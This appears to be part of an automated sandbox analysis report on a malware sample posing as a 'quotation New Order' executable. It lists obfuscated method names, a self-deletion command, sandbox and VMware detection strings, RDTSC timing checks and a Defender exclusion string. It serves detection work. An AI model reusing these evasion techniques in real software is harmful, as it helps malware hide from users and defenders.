Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, lvwCCairfphQUdrpdjp/Gk3IPciZWHTZFgD7L7u.cs	High entropy of concatenated method names: 'q2bAax5c58', 'OPqAwlsp9q', 'plYAs2rqZt', 'CLwAQN1DIr', 'MocAeVGrcd', 'CnWAmoYtO0', 'prpAjeQE7w', 'rgGAzJFAsu', '.ctor', 'dbHVdAWnC5'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, vM07F6if7gBGiEwjLMW/lJ1BSsi69nnVMkIAZhw.cs	High entropy of concatenated method names: 'TWCbl45R0V', 'OdRbNWBHa3', '.ctor', 'WaXl7S8uuHAdhCkgHdC', 'pdQvW78JjADP0kE5jX0', 'L84AwR8XUFQgs9CyJP0', 'AZtiRm880sm4X5y3MDN', 'gohaCa86T1MKAeCql4e', 'nTuHGj8BePNbgJZ82ws', 'oRWjhk80TUhFpCsAhLk'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, rSYmiMiidWAWJyka4fd/UQARkIidLfqtEwaya3X.cs	High entropy of concatenated method names: 'QG2uFEReW9', 'Dispose', 'YhxutIaTAv', 'ICSuTNPr6c', 'eQiuYav3F2', 'rYguLAIydT', 'kxEuR7ggVI', 'kn3uhPIWik', 'Ow4u2VkkMy', 'bW5uxHm9H2'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, N7JlU6TvyD8UQi1vEh/BLcWdxtLUu4DgHUyIK.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'qYtuAbaWLg', 'N9BuVVQwQA', 'UPJNucBwq2', 'mZBNZ8gN2H', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, LPIWikiyTw4VkkMyiW5/OgAIydikT0xE7ggVI0n.cs	High entropy of concatenated method names: '.ctor', 'YUGADoV4fD', 'dfcA4euF2R', 'IW3NFuxyNA', 'wU3AquopJ1', '.cctor', 'Ld35n7uo1HX7d12E41k', 'GS4edausGDY01hnHppe', 'BJfNj9uidT1Ymw4woT2', 'hUnC4puM5em6F9WL7Ao'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, wwmoLdBfx3Ek6f9Wfm/IlRVH4KMNreX8k8Ct2.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'CeKiQ3h5iP', 'JkUieC3kub', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'UPJNucBwq2', 'mZBNZ8gN2H'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, pjurf3iJjattJ2fJLnK/GWCktBicAYvuaolwd4h.cs	High entropy of concatenated method names: '.ctor', 'KnPVXWKCV6', 'lwFVckh7ea', 'PbjVJY5WGA', 'UyvVG21LJ8', 'KAnVpfokZv', 'FlsV6QnAVf', 'G0RVfqOoIp', 'V2SVlPr6XL', 'g8MVN1H7rn'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, iDZ8xOiXgBHHPXagsT8/nroFEYiPFSTHcd2Ft6k.cs	High entropy of concatenated method names: '.ctor', 'HOEVWcBaeU', 'MSWVAtZTiV', 'eukVV1oC6X', 'kceVbFItkr', 'yGFVCm9vDI', 'GAyV1u1MvZ', 'aIdVUvD1Of', 'zOdVMF27aO', 'WCFVHZZ8Ln'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, FjKqRrigXIwRpcqUndn/pnE3D7i5O7fIJ6vLlnA.cs	High entropy of concatenated method names: 'qGiAUUAZJ9', 'eTNAMOZwC3', 'C2LAHdiA7m', 'aF5AgiS6HE', 'eRJA8q7Rqg', '.ctor', 'vg0ACFG7SP', 'qtnAoo7NDm', 'ognA135j2H', 'op_Implicit'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, VRquA0FpPRMjbhk0EU/TodAAH3aTysHIHBQ3Q.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'jIbNyXZjDn', 'xrLuddkRCy', 'h2WuiyOuye', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'UPJNucBwq2'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, gd6Sysy2NZCVAkYGp9/psT1G2kiU0a93ePZdD.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'oYYio1gBjp', 'eTCzi7nKI', 'INRidZnSem', 'slmiiNVVaP', 'uFJiuXZ4q1', 'uhiiWIYURP', 'xcGivSHWaZ', 'TdQiAvkSIf'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, JkUC3kQubvZFLPyr15/fErpUQs4lpfeK3h5iP.cs	High entropy of concatenated method names: 'CSCuMmkV4t', 'on0uIyVflI', 'x4ru5e0lwZ', 'jTMuHtCHjF', 'e2Qun9RNWu', 'Feyu8qSdPo', 'd3aukOlSuj', 'WoMuyn8BXU', 'WV2uO892LT', 'ucGuE0T49g'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, ICSNPri86cAQiav3F2y/whG2ERineW9jhxIaTAv.cs	High entropy of concatenated method names: 'uiaAG8lGuj', 'TOqAp1pD7x', 'TTxAfQRYlj', 'f1fAlauYPU', 'eYqAEwYHV7', 'STJAZkYHq8', 'RDPAr16M5d', 'xGJAPjm6dv', 'Hp5AXseFaA', 'SjNAcKwNMV'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, zjycuKiUmbQKjGCKIZF/XVQG8bi1WiwqJJKxPDO.cs	High entropy of concatenated method names: 'o4OWNmwJsk', 'ybjW7QyxHt', 'WehWqoDM79', 'e6HW4rSerc', 'XidW9I6EhJ', 'pfbWBLv6xB', 'xS9WFVtmyF', 'PscWTeKF7g', 'ab4WYSp4r6', 'T0dWRGqG8H'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, uEEjh99p8x4j0QicOQ/UwOtBTSrAxxq9J9hCM.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', 'UPJNucBwq2', 'jIbNyXZjDn', 'mZBNZ8gN2H', 'wanNWOr7Td', 'O6eihFcYWK', 'SFZi2HZYos', 'MYvix5d3v7', 'zBEiaXiJai'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, mFVx7XDpg69YG6OmwJ/wnBxAi7wlnFwVKrmO4.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'nP8NMEjYtj', 'd8QNReeeWe', 'e1rNGrYZYC', 'BnRNglR4KB', 'WfDNAslrmT', 'rteNr6xdvQ', 'Remove', 'Sq9iEJ9hCM'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, oKxwfPfYvCsB6aRvag/uadQvk6SIf9vSVl9oc.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'P0Xi0CIwmQ', 'HfYi8wKkoZ', 'gRviMPnBxA', 'bwliInFwVK', 'vmOiH4IFVx', 'EXpi5g69YG', 'BOmigwJCEW', 'vQginwivH3'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, GhtsKDgR4u7VCnjUfd/pGku3j5yAM4yj2iYBf.cs	High entropy of concatenated method names: 'uJ4Nsjx6yK', 'CsENJn0kHX', '.ctor', 'AyiN626JOr', 'EsKY8qlfw', 'xSqNegyKs4', 'kunNHu6Fca', 'alINfGrFvZ', 'o79NNTQMWX', 'Remove'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, QtZOfEiHrLCy64GIZD3/VISHyniI6sS9Yfs5W8c.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'CaIAACaUFa', 'U0tAVUq2de', 'f7vvePpbfj', 'Add', 'AddRange', 'Clear', 'KFevmS2uNo'
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, uhl2ldMSAIiohorlM9/Srfdpx0vD6TmtfV06A.cs	High entropy of concatenated method names: 'UF18Fhu8r', 'I12kitC4O', '.ctor', 'XHFymls7i', 'gXHEXjlee', 'SvDr6Tmtf', 'Equals', 'Equals', 'GetHashCode', 'ToString'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, zjycuKiUmbQKjGCKIZF/XVQG8bi1WiwqJJKxPDO.cs	High entropy of concatenated method names: 'o4OWNmwJsk', 'ybjW7QyxHt', 'WehWqoDM79', 'e6HW4rSerc', 'XidW9I6EhJ', 'pfbWBLv6xB', 'xS9WFVtmyF', 'PscWTeKF7g', 'ab4WYSp4r6', 'T0dWRGqG8H'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, rSYmiMiidWAWJyka4fd/UQARkIidLfqtEwaya3X.cs	High entropy of concatenated method names: 'QG2uFEReW9', 'Dispose', 'YhxutIaTAv', 'ICSuTNPr6c', 'eQiuYav3F2', 'rYguLAIydT', 'kxEuR7ggVI', 'kn3uhPIWik', 'Ow4u2VkkMy', 'bW5uxHm9H2'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, mFVx7XDpg69YG6OmwJ/wnBxAi7wlnFwVKrmO4.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'nP8NMEjYtj', 'd8QNReeeWe', 'e1rNGrYZYC', 'BnRNglR4KB', 'WfDNAslrmT', 'rteNr6xdvQ', 'Remove', 'Sq9iEJ9hCM'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, lvwCCairfphQUdrpdjp/Gk3IPciZWHTZFgD7L7u.cs	High entropy of concatenated method names: 'q2bAax5c58', 'OPqAwlsp9q', 'plYAs2rqZt', 'CLwAQN1DIr', 'MocAeVGrcd', 'CnWAmoYtO0', 'prpAjeQE7w', 'rgGAzJFAsu', '.ctor', 'dbHVdAWnC5'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, wwmoLdBfx3Ek6f9Wfm/IlRVH4KMNreX8k8Ct2.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'CeKiQ3h5iP', 'JkUieC3kub', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'UPJNucBwq2', 'mZBNZ8gN2H'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, LPIWikiyTw4VkkMyiW5/OgAIydikT0xE7ggVI0n.cs	High entropy of concatenated method names: '.ctor', 'YUGADoV4fD', 'dfcA4euF2R', 'IW3NFuxyNA', 'wU3AquopJ1', '.cctor', 'Ld35n7uo1HX7d12E41k', 'GS4edausGDY01hnHppe', 'BJfNj9uidT1Ymw4woT2', 'hUnC4puM5em6F9WL7Ao'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, N7JlU6TvyD8UQi1vEh/BLcWdxtLUu4DgHUyIK.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'qYtuAbaWLg', 'N9BuVVQwQA', 'UPJNucBwq2', 'mZBNZ8gN2H', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, vM07F6if7gBGiEwjLMW/lJ1BSsi69nnVMkIAZhw.cs	High entropy of concatenated method names: 'TWCbl45R0V', 'OdRbNWBHa3', '.ctor', 'WaXl7S8uuHAdhCkgHdC', 'pdQvW78JjADP0kE5jX0', 'L84AwR8XUFQgs9CyJP0', 'AZtiRm880sm4X5y3MDN', 'gohaCa86T1MKAeCql4e', 'nTuHGj8BePNbgJZ82ws', 'oRWjhk80TUhFpCsAhLk'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, FjKqRrigXIwRpcqUndn/pnE3D7i5O7fIJ6vLlnA.cs	High entropy of concatenated method names: 'qGiAUUAZJ9', 'eTNAMOZwC3', 'C2LAHdiA7m', 'aF5AgiS6HE', 'eRJA8q7Rqg', '.ctor', 'vg0ACFG7SP', 'qtnAoo7NDm', 'ognA135j2H', 'op_Implicit'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, pjurf3iJjattJ2fJLnK/GWCktBicAYvuaolwd4h.cs	High entropy of concatenated method names: '.ctor', 'KnPVXWKCV6', 'lwFVckh7ea', 'PbjVJY5WGA', 'UyvVG21LJ8', 'KAnVpfokZv', 'FlsV6QnAVf', 'G0RVfqOoIp', 'V2SVlPr6XL', 'g8MVN1H7rn'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, GhtsKDgR4u7VCnjUfd/pGku3j5yAM4yj2iYBf.cs	High entropy of concatenated method names: 'uJ4Nsjx6yK', 'CsENJn0kHX', '.ctor', 'AyiN626JOr', 'EsKY8qlfw', 'xSqNegyKs4', 'kunNHu6Fca', 'alINfGrFvZ', 'o79NNTQMWX', 'Remove'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, VRquA0FpPRMjbhk0EU/TodAAH3aTysHIHBQ3Q.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'jIbNyXZjDn', 'xrLuddkRCy', 'h2WuiyOuye', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'UPJNucBwq2'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, iDZ8xOiXgBHHPXagsT8/nroFEYiPFSTHcd2Ft6k.cs	High entropy of concatenated method names: '.ctor', 'HOEVWcBaeU', 'MSWVAtZTiV', 'eukVV1oC6X', 'kceVbFItkr', 'yGFVCm9vDI', 'GAyV1u1MvZ', 'aIdVUvD1Of', 'zOdVMF27aO', 'WCFVHZZ8Ln'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, JkUC3kQubvZFLPyr15/fErpUQs4lpfeK3h5iP.cs	High entropy of concatenated method names: 'CSCuMmkV4t', 'on0uIyVflI', 'x4ru5e0lwZ', 'jTMuHtCHjF', 'e2Qun9RNWu', 'Feyu8qSdPo', 'd3aukOlSuj', 'WoMuyn8BXU', 'WV2uO892LT', 'ucGuE0T49g'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, ICSNPri86cAQiav3F2y/whG2ERineW9jhxIaTAv.cs	High entropy of concatenated method names: 'uiaAG8lGuj', 'TOqAp1pD7x', 'TTxAfQRYlj', 'f1fAlauYPU', 'eYqAEwYHV7', 'STJAZkYHq8', 'RDPAr16M5d', 'xGJAPjm6dv', 'Hp5AXseFaA', 'SjNAcKwNMV'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, gd6Sysy2NZCVAkYGp9/psT1G2kiU0a93ePZdD.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'oYYio1gBjp', 'eTCzi7nKI', 'INRidZnSem', 'slmiiNVVaP', 'uFJiuXZ4q1', 'uhiiWIYURP', 'xcGivSHWaZ', 'TdQiAvkSIf'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, uhl2ldMSAIiohorlM9/Srfdpx0vD6TmtfV06A.cs	High entropy of concatenated method names: 'UF18Fhu8r', 'I12kitC4O', '.ctor', 'XHFymls7i', 'gXHEXjlee', 'SvDr6Tmtf', 'Equals', 'Equals', 'GetHashCode', 'ToString'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, oKxwfPfYvCsB6aRvag/uadQvk6SIf9vSVl9oc.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'P0Xi0CIwmQ', 'HfYi8wKkoZ', 'gRviMPnBxA', 'bwliInFwVK', 'vmOiH4IFVx', 'EXpi5g69YG', 'BOmigwJCEW', 'vQginwivH3'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, QtZOfEiHrLCy64GIZD3/VISHyniI6sS9Yfs5W8c.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'CaIAACaUFa', 'U0tAVUq2de', 'f7vvePpbfj', 'Add', 'AddRange', 'Clear', 'KFevmS2uNo'
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, uEEjh99p8x4j0QicOQ/UwOtBTSrAxxq9J9hCM.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', 'UPJNucBwq2', 'jIbNyXZjDn', 'mZBNZ8gN2H', 'wanNWOr7Td', 'O6eihFcYWK', 'SFZi2HZYos', 'MYvix5d3v7', 'zBEiaXiJai'

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	Process created: /c del "C:\Users\user\Desktop\quotation New Order I5117.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: /c del "C:\Users\user\Desktop\quotation New Order I5117.exe"			Jump to behavior

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 1.2.quotation New Order I5117.exe.333b288.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.quotation New Order I5117.exe.332f218.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.300985845.0000000003301000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: quotation New Order I5117.exe PID: 6380, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: quotation New Order I5117.exe, 00000001.00000002.300985845.0000000003301000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: quotation New Order I5117.exe, 00000001.00000002.300985845.0000000003301000.00000004.00000001.sdmp, quotation New Order I5117.exe, 00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000000BE8604 second address: 0000000000BE860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000000BE898E second address: 0000000000BE8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\quotation New Order I5117.exe TID: 6400	Thread sleep time: -34737s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe TID: 4716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 160	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe TID: 5788	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Code function: 12_2_004088C0 rdtsc

12_2_004088C0

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	17_2_00D8B89C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D968BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	17_2_00D968BA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D9245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	17_2_00D9245C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DA31DC FindFirstFileW,FindNextFileW,FindClose,	17_2_00DA31DC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D885EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	17_2_00D885EA

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Thread delayed: delay time: 34737			Jump to behavior
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: quotation New Order I5117.exe, 00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000D.00000000.339162348.0000000000B7D000.00000004.00000020.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: quotation New Order I5117.exe, 00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000D.00000000.315708298.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: quotation New Order I5117.exe, 00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000D.00000000.332026348.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000D.00000000.327391753.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.315708298.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000D.00000000.327391753.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 0000000D.00000000.315708298.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: quotation New Order I5117.exe, 00000001.00000002.301124869.00000000033C9000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000D.00000000.316127789.0000000008957000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563

Source: C:\Windows\SysWOW64\cmd.exe

